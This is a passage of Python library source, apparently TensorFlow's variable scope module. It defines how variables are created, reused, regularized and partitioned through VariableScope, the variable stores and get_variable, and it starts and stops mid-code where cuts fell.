variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
if "partition_info" in tf_inspect.getargspec(initializer).args:
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
else:
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
def make_regularizer_op():
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
return regularizer(v)
if regularizer(v) is not None:
lazy_eval_tensor = _LazyEvalTensor(make_regularizer_op)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES,
lazy_eval_tensor)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
class _LazyEvalTensor(core.Tensor):
"""A Tensor-like object that only evaluates its thunk when used."""
def __init__(self, thunk):
"""Initializes a _LazyEvalTensor object.
Args:
thunk: A callable. A thunk which computes the value of the tensor.
"""
self._thunk = thunk
self._master_tensor = thunk()
def _as_tensor(self, dtype=None, name=None, as_ref=False):
del name
assert not as_ref
assert dtype in [None, self.dtype]
return self._thunk()
def _make_master_property(name):
@property
def prop(self):
return getattr(self._master_tensor, name) # pylint: disable=protected-access
return prop
_master_property_list = ("device", "dtype", "graph", "name", "op", "shape",
"value_index")
for _name in _master_property_list:
setattr(_LazyEvalTensor, _name, _make_master_property(_name))
def _make_master_method(name):
def method(self, *args, **kwargs):
return getattr(self._master_tensor, name)(*args, **kwargs) # pylint: disable=protected-access
return method
_master_method_list = ("get_shape", "__str__", "shape_as_list")
for _name in _master_method_list:
setattr(_LazyEvalTensor, _name, _make_master_method(_name))
def _make_op_method(name):
def method(self, *args, **kwargs):
return getattr(self._as_tensor(), name)(*args, **kwargs) # pylint: disable=protected-access
return method
_op_list = ("__abs__", "__add__", "__and__", "__bool__", "__div__", "__eq__",
"__floordiv__", "__ge__", "__getitem__", "__gt__", "__invert__",
"__iter__", "__le__", "__len__", "__lt__", "__matmul__", "__mod__",
"__mul__", "__ne__", "__neg__", "__nonzero__", "__or__", "__pow__",
"__radd__", "__rand__", "__rdiv__", "__rfloordiv__", "__rmatmul__",
"__rmod__", "__rmul__", "__ror__", "__rpow__", "__rsub__",
"__rtruediv__", "__rxor__", "__sub__", "__truediv__", "__xor__",
"eval", "numpy")
for _name in _op_list:
setattr(_LazyEvalTensor, _name, _make_op_method(_name))
ops.register_tensor_conversion_function(
_LazyEvalTensor,
lambda val, dtype, name, as_ref: val._as_tensor(dtype, name, as_ref) # pylint: disable=protected-access
)
session.register_session_run_conversion_functions(
_LazyEvalTensor,
lambda fetch: ([fetch._master_tensor], lambda fetched_vals: fetched_vals[0]) # pylint: disable=protected-access
)
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
